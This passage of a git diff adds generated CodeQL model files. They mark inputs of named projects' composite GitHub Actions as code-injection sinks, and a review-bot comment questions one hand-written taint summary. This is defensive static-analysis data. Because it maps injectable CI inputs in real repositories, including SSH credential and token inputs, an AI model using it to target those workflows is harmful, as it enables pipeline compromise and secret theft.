+++ b/actions/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/actions/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml new file mode 100644 index 000000000000..3c6675a13c9e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.srcdir", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.test-opts", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.report-path", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/actions/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml new file mode 100644 index 000000000000..9f0f612d1a60 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_USER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.sim_output", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_SSH_PASS", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/actions/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml new file mode 100644 index 000000000000..9e5715f26385 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.upload-chunk-size", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.restore-keys", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.save-always", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.lookup-only", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.fail-on-cache-miss", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.enableCrossOsArchive", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.key", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/actions/ql/lib/ext/generated/composite-actions/saltstack_salt.yml new file mode 100644 index 000000000000..02fe0539869e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/actions/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml new file mode 100644 index 000000000000..86be8acfeea0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/actions/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml new file mode 100644 index 000000000000..fff292f42bbd --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] + - ["scala-native/scala-native", "*", "input.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/actions/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml new file mode 100644 index 000000000000..141c52a8ccd3 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["scitools/iris", "*", "input.version", "code-injection", "generated"] + - ["scitools/iris", "*", "input.install_packages", "code-injection", "generated"] + - ["scitools/iris", "*", "input.env_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/actions/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml new file mode 100644 index 000000000000..a073f87d9454 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubToken", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubRef", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubRepository", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/actions/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml new file mode 100644 index 000000000000..5e10745332bd --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.os", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.runs-on", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.config", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/actions/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml new file mode 100644 index 000000000000..e278f0849bff --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.context", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.job_name", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/actions/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml new file mode 100644 index 000000000000..45598fe4bc78 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] + - ["shakacode/react-webpack-rails-tutorial", "*", "input.app_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/actions/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml new file mode 100644 index 000000000000..f1689c520290 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/actions/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml new file mode 100644 index 000000000000..00ae4bfb9b85 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] + - ["slint-ui/slint", "*", "input.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/actions/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml new file mode 100644 index 000000000000..1bd2cf924182 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.labels", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.base", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/actions/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml new file mode 100644 index 000000000000..2dc89f564f5d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/actions/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml new file mode 100644 index 000000000000..9dbd2fce9892 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.binary_path", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.artifact", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.major_version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.branch", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.framework", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/actions/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml new file mode 100644 index 000000000000..7722a6353072 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "input.container-version", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "input.container", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/actions/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml new file mode 100644 index 000000000000..4fc41527037c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/actions/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml new file mode 100644 index 000000000000..729aa139693e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml new file mode 100644 index 000000000000..e08457ef5ea7 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] + - ["spring-io/initializr", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml new file mode 100644 index 000000000000..c19a1fc3eef1 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] + - ["spring-io/start.spring.io", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml new file mode 100644 index 000000000000..a719b0dc87e7 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-boot", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml new file mode 100644 index 000000000000..9a9b3a5d3df8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-framework", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml new file mode 100644 index 000000000000..3f9b4ea61cc5 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-graphql", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/actions/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml new file mode 100644 index 000000000000..6e36f5dea2be --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "input.fix-task", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "input.personal-access-token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/actions/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml new file mode 100644 index 000000000000..f1b143d7c44f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] + - ["stefanprodan/podinfo", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/actions/ql/lib/ext/generated/composite-actions/stellar_go.model.yml new file mode 100644 index 000000000000..42d9df16b35d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/stellar_go.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/actions/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml new file mode 100644 index 000000000000..386b0aa6ea94 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/actions/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml new file mode 100644 index 000000000000..54bf59f06470 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml new file mode 100644 index 000000000000..2a2a8fcc2063 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml 
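Review bot: The second `addsTo` entry in streetsidesoftware_cspell.model.yml carries provenance `manual` (`["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"]`) while the file sits under `ext/generated/` and every other row in this directory is `generated`; a re-run of the model generator would presumably discard or overwrite this hand-written taint summary, silently losing the `input.value` → `output.value` flow step. If the summary is meant to be kept, move it to a hand-maintained model file outside `ext/generated/` (or, if the generator actually emitted it, set the provenance column to `generated` so the file stays consistent). This file is also the only one in the batch that ends with a trailing newline, which is consistent with it having been edited by hand after generation.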
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.spec-url", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.language", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.job-name", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.build-commands", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml new file mode 100644 index 000000000000..05dbdf6bf45b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.parserSpecPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.serializationType", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.options", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.inputSpec", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.parserVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/actions/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml new file mode 100644 index 000000000000..4276ce4b98dd --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "input.chat-id", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "input.revision", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "input.submodule", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/actions/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml new file mode 100644 index 000000000000..ac210c93a1ec --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/actions/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml new file mode 100644 index 000000000000..501d4a8a45f5 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] + - ["tensorflow/datasets", "*", "input.tf-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/actions/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml new file mode 100644 index 000000000000..b582844dc7c8 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/actions/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml new file mode 100644 index 000000000000..9de223281878 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.nmHoistingLimits", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.path", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.cluster-location", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.cluster-name", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.gcp-project-id", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.package", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/actions/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml new file mode 100644 index 000000000000..7234c3cbd5f4 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "input.compose-directory", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "input.compose-file", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/actions/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml new file mode 100644 index 000000000000..27ee66eae484 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "input.model", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "input.status", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "input.full-deps", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/actions/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml new file mode 100644 index 000000000000..96586d295343 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.command", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.duration", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.requirements", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml new file mode 100644 index 000000000000..5e7e997272d3 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.post-init", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.setup-deps", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.label", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.debug", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.check-run-id", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.check-all-mode", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.cache-key", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/actions/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml new file mode 100644 index 000000000000..8a9326121006 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/actions/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml new file mode 100644 index 000000000000..494e71db707b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/actions/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml new file mode 100644 index 000000000000..200f6bbfc437 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/actions/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml new file mode 100644 index 000000000000..a542370c7de2 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml 
